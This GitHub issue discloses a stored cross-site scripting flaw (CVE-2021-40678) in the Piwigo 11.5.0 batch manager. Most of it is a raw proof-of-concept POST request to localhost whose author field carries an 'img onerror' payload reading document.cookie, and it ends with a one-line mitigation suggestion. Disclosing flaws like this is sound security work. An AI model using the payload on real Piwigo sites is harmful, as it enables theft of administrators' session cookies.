Headline
CVE-2021-40678: Persistent Cross Site Scripting in Batch Manager(version:11.5.0) · Issue #1476 · Piwigo/Piwigo
In Piwigo 11.5.0, there exists a persistent cross-site scripting in the single mode function through /admin.php?page=batch_manager&mode=unit.
Description:
In the single mode function of the Piwigo system, modifying the author parameter of the picture can cause persistent cross-site scripting
Vulnerable Instances:
/admin.php?page=batch_manager&mode=unit
affected source code file
request
POST /admin.php?page=batch_manager&mode=unit HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin.php?page=batch_manager&mode=unit
Cookie: pwg_id=mof6jca30q9tr1qu48hhvqi143
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
element_ids=4&name-4=test&author-4=11111%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E11&date_creation-4=&level-4=0&description-4=&submit=Submit
suggestion
Restrict user input and output